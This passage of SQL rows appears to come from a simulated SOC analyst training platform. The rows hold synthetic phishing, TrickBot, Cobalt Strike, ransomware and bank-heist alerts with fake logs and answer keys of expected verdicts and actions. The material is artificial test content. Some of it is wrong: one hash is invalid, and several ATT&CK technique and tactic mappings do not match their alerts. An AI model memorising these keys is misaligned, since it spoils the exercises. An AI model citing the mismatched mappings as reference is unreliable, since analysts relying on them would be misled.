(286, 'Malicious Domain Infrastructure Identified', 'high', 'Firewall', 'APT28 has set up a credential harvesting operation using domains that mimic legitimate login portals. User traffic is being redirected to these domains following a successful phishing campaign. The captured credentials will allow the adversary to escalate their access within the network.', 'Credential Harvesting', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"firewall_id\":\"FW123456\",\"src_ip\":\"10.14.22.5\",\"dst_ip\":\"203.0.113.45\",\"src_port\":\"443\",\"dst_port\":\"80\",\"action\":\"allow\",\"domain\":\"login-secure-portal.com\",\"url\":\"http://login-secure-portal.com/login\",\"user\":\"jdoe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file\":\"login_page.html\"}', '2025-12-31 15:17:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing activities.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"login-secure-portal.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Domain registered recently and flagged for phishing.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://login-secure-portal.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"URL is hosting a phishing login page.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Database\",\"verdict\":\"suspicious\",\"details\":\"Hash matches known phishing page template.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(287, 'OAuth Token Abuse Technique Detected', 'high', 'EDR', 'APT28 uses OAuth token abuse to maintain access to compromised accounts, which enables them to exfiltrate sensitive data without needing user passwords.', 'Persistence', 'T1550.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:32Z\",\"event_id\":\"evt12345\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"username\":\"j.doe@company.com\",\"oauth_token\":\"ya29.GlsBv...Xw3Fw\",\"action\":\"token_use\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"sensitive_data.docx\",\"user_agent\":\"Mozilla/5.0\",\"event_description\":\"OAuth token used for accessing cloud storage\"}', '2025-12-31 15:17:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"Known APT28 IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_db\",\"verdict\":\"internal\",\"details\":\"Employee email address\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file hash with potential data exfiltration\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(288, 'Disinformation Campaign Planning Uncovered', 'high', 'Threat Intelligence Platform', 'Analysts have uncovered a coordinated disinformation campaign through leaked communications from APT28 operatives. The campaign aims to discredit political figures and manipulate election outcomes using fake news distribution and social media manipulation.', 'Information Operations', 'T1027 - Obfuscated Files or Information', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"185.92.220.50\",\"destination_ip\":\"192.168.1.105\",\"malicious_filename\":\"election_strategy_2023.pdf\",\"hash_sha256\":\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\",\"username\":\"jdoe\",\"action\":\"file_download\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"description\":\"Leaked document detailing plans for disinformation campaign.\"}', '2025-12-31 15:17:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT28 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious document.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"election_strategy_2023.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Reports\",\"verdict\":\"suspicious\",\"details\":\"File used in the distribution of disinformation content.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(289, 'Phishing Email Detected', 'medium', 'Email Gateway', 'A phishing email was detected targeting hospital staff. The email contains a malicious link designed to download TrickBot malware upon clicking.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"email_subject\":\"Important Update Required\",\"sender_email\":\"attacker@example.com\",\"recipient_email\":\"staff@hospital.org\",\"malicious_link\":\"http://malicious-link.com/download\",\"attachment\":\"none\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"update-instructions.html\"}', '2025-12-31 15:22:50', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing email address associated with multiple attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"URL associated with TrickBot malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"suspicious\",\"details\":\"IP address flagged for suspicious activity in recent phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to TrickBot malware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"update-instructions.html\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in phishing emails.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(290, 'TrickBot Malware Execution', 'high', 'EDR', 'TrickBot malware was executed on an employee\'s workstation, allowing the attacker to establish a foothold in the network. The malware is designed to harvest credentials and facilitate further attacks.', 'Malware', 'TA0002 - Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:16Z\",\"event_type\":\"malware_execution\",\"src_ip\":\"192.168.1.45\",\"dest_ip\":\"34.210.123.158\",\"user\":\"jdoe\",\"process_name\":\"trickbot.exe\",\"process_id\":\"5678\",\"file_hash\":\"3f0a2f5e4d3a9b5c7f6e9df123456789\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\trickbot.exe\",\"detected_by\":\"EDR Agent\",\"malicious_score\":95}', '2025-12-31 15:22:50', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"34.210.123.158\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"This IP address has been associated with TrickBot C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f0a2f5e4d3a9b5c7f6e9df123456789\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known TrickBot malware hash.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"trickbot.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with TrickBot malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Username of the employee whose workstation was compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(291, 'Persistence Mechanism Identified', 'high', 'EDR', 'The attacker has established a persistence mechanism on the compromised system using TrickBot. This allows them to maintain access even after system reboots.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-24T14:23:52Z\",\"event_id\":\"12345\",\"hostname\":\"victim-pc\",\"user\":\"jdoe\",\"process_name\":\"trickbot.exe\",\"process_id\":\"6789\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\",\"registry_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\TrickBot\",\"registry_value\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"command_line\":\"\\\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\\\" --silent\"}', '2025-12-31 15:22:50', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal company IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious_ip_database\",\"verdict\":\"malicious\",\"details\":\"Known TrickBot command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with TrickBot malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"trickbot.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Executable linked to TrickBot malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"clean\",\"details\":\"Valid user in the company directory\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(292, 'Cobalt Strike Beacon Detected', 'high', 'Network Traffic Analysis', 'The attacker deploys Cobalt Strike beacons to move laterally, targeting critical systems within the hospital network to spread the ransomware.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:53Z\",\"source_ip\":\"193.161.35.75\",\"destination_ip\":\"10.10.15.23\",\"protocol\":\"HTTP\",\"uri\":\"/stager\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"beacon.exe\",\"username\":\"janedoe\",\"action\":\"download\"}', '2025-12-31 15:22:50', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"193.161.35.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Cobalt Strike command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal hospital network endpoint\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Cobalt Strike payload\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"beacon.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used in lateral movement\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"janedoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unexpected activity from this user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NULL', 1, 0, NULL),
(293, 'Ransomware Encryption Initiated', 'critical', 'EDR', 'The ransomware has been executed across the hospital\'s network, encrypting patient data and rendering systems unusable. Immediate focus is required on data recovery and remediation.', 'Exfiltration', 'T1486: Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:35:21Z\",\"event_id\":\"12345\",\"source_ip\":\"198.51.100.23\",\"target_ip\":\"10.0.0.25\",\"username\":\"hospital_admin\",\"file_affected\":\"patient_records.dat\",\"file_hash\":\"a3f5d6e8b9c2d4a1e9f8b6c4d5e9a2b3\",\"action\":\"encrypt\",\"process_name\":\"ransomware.exe\",\"process_id\":\"6789\",\"severity\":\"critical\"}', '2025-12-31 15:22:50', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known ransomware command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Hospital network server being targeted.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a3f5d6e8b9c2d4a1e9f8b6c4d5e9a2b3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware strain.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"patient_records.dat\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical patient data file targeted for encryption.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"hospital_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Admin account used to execute the ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(294, 'Initial Access via Spear Phishing Campaign', 'high', 'Email Gateway', 'An email containing a malicious attachment was sent to key personnel within the bank, appearing as an urgent internal communication. The attachment, if opened, installs malware to gain access to the internal network.', 'Phishing', 'T1566.001 - Phishing: Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"email_subject\":\"Urgent: Updated Security Protocols\",\"sender_email\":\"it-security@bank.com\",\"recipient_email\":\"j.doe@bank.com\",\"attachment_name\":\"SecurityUpdate.docx\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"source_ip\":\"203.0.113.45\",\"recipient_ip\":\"10.0.1.15\",\"smtp_id\":\"<20231005142345.1.1234567890@bank.com>\"}', '2025-12-31 15:23:56', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"it-security@bank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"Email domain recently used in phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with trojans.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous phishing attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(295, 'Malware Execution and Credential Harvesting', 'high', 'EDR', 'The malware was executed on a compromised system, allowing attackers to harvest credentials of bank clerks and administrators. This activity was detected following a successful phishing attempt, which is pivotal for attackers to gain further access to critical financial systems.', 'Malware', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:58Z\",\"event_type\":\"execution\",\"hostname\":\"finance-dept-pc1\",\"internal_ip\":\"192.168.10.45\",\"external_ip\":\"203.0.113.15\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"credential_harvester.exe\",\"executing_user\":\"jdoe\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\credential_harvester.exe\",\"detected_by\":\"EDR\",\"status\":\"malicious\",\"os\":\"Windows 10\",\"process_id\":4567}', '2025-12-31 15:23:56', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"MD5 hash matches a known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"credential_harvester.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Logs\",\"verdict\":\"malicious\",\"details\":\"Suspicious executable used for credential harvesting.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(296, 'Lateral Movement through Network Exploitation', 'high', 'Network Monitoring', 'Using the harvested credentials and specialized administrative tools, the attackers move laterally across the network. They target systems responsible for managing ATM withdrawal limits and SWIFT transactions, setting the stage for unauthorized financial operations.', 'Lateral Movement', 'T1021', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.2.15\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe_admin\",\"used_tool\":\"PsExec\",\"target_system\":\"ATM-Controller-02\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event\":\"Lateral movement detected from 192.168.1.105 to 10.0.2.15 using PsExec by user jdoe_admin.\"}', '2025-12-31 15:23:56', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted system.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised administrative account used for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious administrative tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(297, 'Manipulation of ATM Withdrawal Limits and SWIFT Gateway', 'high', 'Transaction Monitoring System', 'Attackers have manipulated ATM withdrawal limits and initiated unauthorized SWIFT transactions, leading to substantial financial losses. This step marks the culmination of their heist.', 'Manipulation', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"event_id\":\"ATM-TRANS-0004\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.25\",\"username\":\"jdoe_admin\",\"action\":\"ATM Withdrawal Limit Manipulation\",\"transaction_id\":\"SWIFT-TRANS-8976\",\"file_hash\":\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\",\"affected_account\":\"1234567890\",\"amount\":\"50000\",\"currency\":\"USD\"}', '2025-12-31 15:23:56', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP for financial fraud operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal bank system IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Admin account used during unauthorized transaction manipulations.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used for financial fraud.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(302, 'Suspicious Process Execution Detected', 'high', 'CrowdStrike', 'A suspicious process was executed on a host using a known LOLBin technique. The executed script attempted to connect to a known Command and Control (C2) server.', 'Malware', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2023-10-01T15:24:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"workstation-05\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"domain\":\"malicious-c2.example.com\"}', '2026-01-01 23:58:23', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process used a known LOLBin for execution and attempted to communicate with a malicious C2 server, confirming the malware presence.\"}', 'Intermediate', 'NULL', 1, 0, NULL),
(303, 'Phishing Email with Malicious Link Detected', 'critical', 'Proofpoint', 'A phishing email was received containing a malicious link designed to harvest credentials. The email used a spoofed domain similar to a trusted one.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2023-10-02T09:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.45\",\"username\":\"asmith\",\"hostname\":\"email-server\",\"email_sender\":\"admin@trusfed-business.com\",\"url\":\"http://malicious-link.example.com\"}', '2026-01-01 23:41:20', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"IP associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"admin@trusfed-business.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"Email domain spoofing a legitimate business\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-link.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing site designed to steal 